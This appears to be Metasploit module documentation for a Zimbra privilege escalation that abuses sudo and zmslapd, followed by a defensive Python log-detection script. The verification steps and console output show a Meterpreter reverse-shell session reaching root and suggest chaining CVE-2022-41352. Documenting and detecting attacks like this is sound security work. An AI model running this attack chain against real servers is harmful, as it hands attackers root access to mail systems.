## Vulnerable Application

The following versions of Zimbra are vulnerable:

* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier

## Verification Steps

Install Zimbra on any supported Linux version and get a session as the `zimbra` user. The easiest way to exploit Zimbra is to `rm $(which pax)`, reboot, and use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run it. From there:

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
```

## Options

### SUDO_PATH

The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.

### ZIMBRA_BASE

The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
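The module output above shows the tell-tale event a defender can alert on: `sudo` running `zmslapd` as root with a `-f` config file under `/tmp` instead of the install tree. The following detection script is an added example, not part of the Metasploit module; it assumes the standard `sudo` syslog record format, that the legitimate slapd config lives under `<ZIMBRA_BASE>/conf/`, and uses constructed sample log lines.

```python
import re

# Assumed default install base; matches the module's ZIMBRA_BASE default.
ZIMBRA_BASE = "/opt/zimbra"

# Standard sudo syslog record: "sudo: <user> : TTY=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$"
)

def parse_sudo_record(line):
    """Return (invoking user, target user, command string) or None if not a sudo record."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("target"), m.group("cmd").strip()

def slapd_config_path(argv):
    """Return the argument following -f in a zmslapd argv list, or None."""
    if not argv or not argv[0].endswith("/zmslapd"):
        return None
    for i, arg in enumerate(argv[:-1]):
        if arg == "-f":
            return argv[i + 1]
    return None

def is_suspicious(line, base=ZIMBRA_BASE):
    """True when sudo ran zmslapd as root either with -u root or with a -f config
    outside <base>/conf/ (the pattern in the module's trigger command)."""
    rec = parse_sudo_record(line)
    if rec is None:
        return False
    _user, target, cmd = rec
    argv = cmd.split()
    if target != "root" or not argv or not argv[0].endswith("/zmslapd"):
        return False
    cfg = slapd_config_path(argv)
    bad_cfg = cfg is not None and not cfg.startswith(base.rstrip("/") + "/conf/")
    runs_as_root = any(a == "-u" and argv[i + 1] == "root" for i, a in enumerate(argv[:-1]))
    return bad_cfg or runs_as_root

# Constructed sample lines (not real captures); the second mirrors the module's trigger.
SAMPLE_LOG = [
    "Jul 21 14:03:55 zimbra sudo:   zimbra : TTY=unknown ; PWD=/opt/zimbra ; USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u zimbra -F /opt/zimbra/data/ldap/config",
    "Jul 21 14:04:12 zimbra sudo:   zimbra : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3",
    "Jul 21 14:05:01 zimbra sudo:   zimbra : TTY=pts/0 ; PWD=/opt/zimbra ; USER=root ; COMMAND=/opt/zimbra/libexec/zmslapd -u zimbra -f /opt/zimbra/conf/slapd.conf",
]

def find_suspicious(lines, base=ZIMBRA_BASE):
    """Filter log lines down to the ones matching the zmslapd abuse pattern."""
    return [l for l in lines if is_suspicious(l, base)]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("ALERT:", hit)
```

Feed it `/var/log/auth.log` (or journald output for the sudo unit) to check whether the pattern has already fired on a host; removing the `NOPASSWD` sudo rule for `zmslapd`, or patching, is the fix.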